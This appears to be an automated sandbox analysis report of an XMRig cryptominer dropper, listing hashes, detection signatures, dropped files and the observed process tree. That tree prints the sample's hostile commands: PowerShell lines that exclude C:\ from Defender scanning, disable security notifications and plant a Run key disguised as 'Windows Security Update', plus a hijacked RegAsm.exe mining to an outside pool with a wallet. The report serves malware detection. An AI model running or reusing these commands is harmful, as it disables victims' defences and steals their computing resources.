Overview

overview

10

Static

static

10

202ad65f39...2f.exe

windows7-x64

10

202ad65f39...2f.exe

windows10-2004-x64

10

2722079047...42.exe

windows7-x64

8

2722079047...42.exe

windows10-2004-x64

8

61b08c9b1c...29.exe

windows7-x64

10

61b08c9b1c...29.exe

windows10-2004-x64

10

a89d4dfabf...a9.exe

windows7-x64

10

a89d4dfabf...a9.exe

windows10-2004-x64

10

bb1e9db6d9...76.exe

windows7-x64

10

bb1e9db6d9...76.exe

windows10-2004-x64

10

e9fca3db7f...67.exe

windows7-x64

10

e9fca3db7f...67.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    152s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    07-09-2022 13:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe

  • Size

    5.8MB

  • MD5

    27124a76fe1a7d01090183e7eb646b0e

  • SHA1

    9612c76890e70d63298e674601921cc3a9bbc00c

  • SHA256

    bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776

  • SHA512

    1e218f3b9acdc19dc9d915bbe0cf8afd4b4a0804f2a105aaf063a149cc78995a0948327b4086f6b97d35a213ae951a29e6a5bd91e5438b37585e54b8f6fbdda2

  • SSDEEP

    98304:FuAXqhdxBaSbIzxiEXUfcZYU5XiG0Yq9VaEZns3VpUCpBx4Yfq8WwnwPNq3HZQ:0AWbNbIzxibcZYDFYXjHBq8WwC8Q

Score
10/10
xmrigminerpersistenceupx

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 3 IoCs
    miner
  • Executes dropped EXE 1 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe
    "C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:900
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1892
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" Set-MpPreference -PUAProtection 1
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1472
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" Add-MpPreference -ExclusionPath C:\
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1384
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications' -Name DisableNotifications -Value 1
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:612
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security Update';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security Update' -Value '"C:\Users\Admin\AppData\Local\Temp\Windows Security Update\WinSec.exe"' -PropertyType 'String'
        3⤵
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2008
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe --donate-level 0 --max-cpu-usage 50 -o pool.supportxmr.com:3333 -u 4774bMmQt7g8FfWNP1K51Tdy7v5DS2ZRYarJcEmpy8rAXnuycfKGerFdEawGvgHUnCePRxky732gfcowXbXHcwT69rhLT5w.rig16
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1708

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
    Filesize

    5.7MB

    MD5

    a419d5d9882f43143818df7122c684a1

    SHA1

    63a5ae4680d40c7c87d3b5b96317a8afbf42d071

    SHA256

    594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7

    SHA512

    3d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
    Filesize

    5.7MB

    MD5

    a419d5d9882f43143818df7122c684a1

    SHA1

    63a5ae4680d40c7c87d3b5b96317a8afbf42d071

    SHA256

    594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7

    SHA512

    3d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    ac590245904e4b02a2a0f76fee439591

    SHA1

    e89492ba719a7d0b55d1777d103c98a6050eb571

    SHA256

    f8cd18c85c92cae966d1873ebc96d6d2efd0462ce8f598e651c15958bb159f19

    SHA512

    76b54989b4448d65e752fb173e448c4bfcc220c1ad3827855a42ff4d683e02d6b4aeae264a49a9d5cea46b1a2fe3c815efefbf71fb5a537031bcf362e078d863

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    ac590245904e4b02a2a0f76fee439591

    SHA1

    e89492ba719a7d0b55d1777d103c98a6050eb571

    SHA256

    f8cd18c85c92cae966d1873ebc96d6d2efd0462ce8f598e651c15958bb159f19

    SHA512

    76b54989b4448d65e752fb173e448c4bfcc220c1ad3827855a42ff4d683e02d6b4aeae264a49a9d5cea46b1a2fe3c815efefbf71fb5a537031bcf362e078d863

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    ac590245904e4b02a2a0f76fee439591

    SHA1

    e89492ba719a7d0b55d1777d103c98a6050eb571

    SHA256

    f8cd18c85c92cae966d1873ebc96d6d2efd0462ce8f598e651c15958bb159f19

    SHA512

    76b54989b4448d65e752fb173e448c4bfcc220c1ad3827855a42ff4d683e02d6b4aeae264a49a9d5cea46b1a2fe3c815efefbf71fb5a537031bcf362e078d863

    Download Submit

  • \Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
    Filesize

    5.7MB

    MD5

    a419d5d9882f43143818df7122c684a1

    SHA1

    63a5ae4680d40c7c87d3b5b96317a8afbf42d071

    SHA256

    594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7

    SHA512

    3d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a

    Download Submit

  • memory/612-98-0x000000000250B000-0x000000000252A000-memory.dmp

    Filesize

    124KB

    Download

  • memory/612-81-0x0000000002504000-0x0000000002507000-memory.dmp

    Filesize

    12KB

    Download

  • memory/612-82-0x000007FEEC590000-0x000007FEED0ED000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/612-97-0x0000000002504000-0x0000000002507000-memory.dmp

    Filesize

    12KB

    Download

  • memory/612-86-0x000000001B740000-0x000000001BA3F000-memory.dmp

    Filesize

    3.0MB

    Download

  • memory/612-96-0x000000000250B000-0x000000000252A000-memory.dmp

    Filesize

    124KB

    Download

  • memory/612-68-0x000007FEF34A0000-0x000007FEF3EC3000-memory.dmp

    Filesize

    10.1MB

    Download

  • memory/612-93-0x0000000002504000-0x0000000002507000-memory.dmp

    Filesize

    12KB

    Download

  • memory/900-54-0x000007FEFC3B1000-0x000007FEFC3B3000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1384-70-0x000007FEF34A0000-0x000007FEF3EC3000-memory.dmp

    Filesize

    10.1MB

    Download

  • memory/1384-94-0x00000000029B4000-0x00000000029B7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1384-90-0x00000000029B4000-0x00000000029B7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1384-80-0x00000000029B4000-0x00000000029B7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1384-95-0x00000000029BB000-0x00000000029DA000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1384-84-0x000000001B760000-0x000000001BA5F000-memory.dmp

    Filesize

    3.0MB

    Download

  • memory/1384-77-0x000007FEEC590000-0x000007FEED0ED000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/1472-92-0x0000000002964000-0x0000000002967000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1472-85-0x000000001B7A0000-0x000000001BA9F000-memory.dmp

    Filesize

    3.0MB

    Download

  • memory/1472-78-0x0000000002964000-0x0000000002967000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1472-87-0x0000000002964000-0x0000000002967000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1472-75-0x000007FEEC590000-0x000007FEED0ED000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/1472-88-0x000000000296B000-0x000000000298A000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1708-107-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/1708-113-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/1708-101-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/1708-100-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/1708-112-0x0000000000000000-0x0000000001000000-memory.dmp

    Filesize

    16.0MB

    Download

  • memory/1708-105-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/1708-110-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/1708-103-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/1708-109-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/1708-108-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/1708-111-0x00000000000F0000-0x0000000000104000-memory.dmp

    Filesize

    80KB

    Download

  • memory/1892-99-0x0000000000950000-0x00000000009C8000-memory.dmp

    Filesize

    480KB

    Download

  • memory/1892-59-0x0000000001380000-0x000000000192E000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2008-79-0x0000000002714000-0x0000000002717000-memory.dmp

    Filesize

    12KB

    Download

  • memory/2008-76-0x000007FEEC590000-0x000007FEED0ED000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/2008-89-0x0000000002714000-0x0000000002717000-memory.dmp

    Filesize

    12KB

    Download

  • memory/2008-91-0x000000000271B000-0x000000000273A000-memory.dmp

    Filesize

    124KB

    Download

  • memory/2008-74-0x000007FEF34A0000-0x000007FEF3EC3000-memory.dmp

    Filesize

    10.1MB

    Download

  • memory/2008-83-0x000000001B720000-0x000000001BA1F000-memory.dmp

    Filesize

    3.0MB

    Download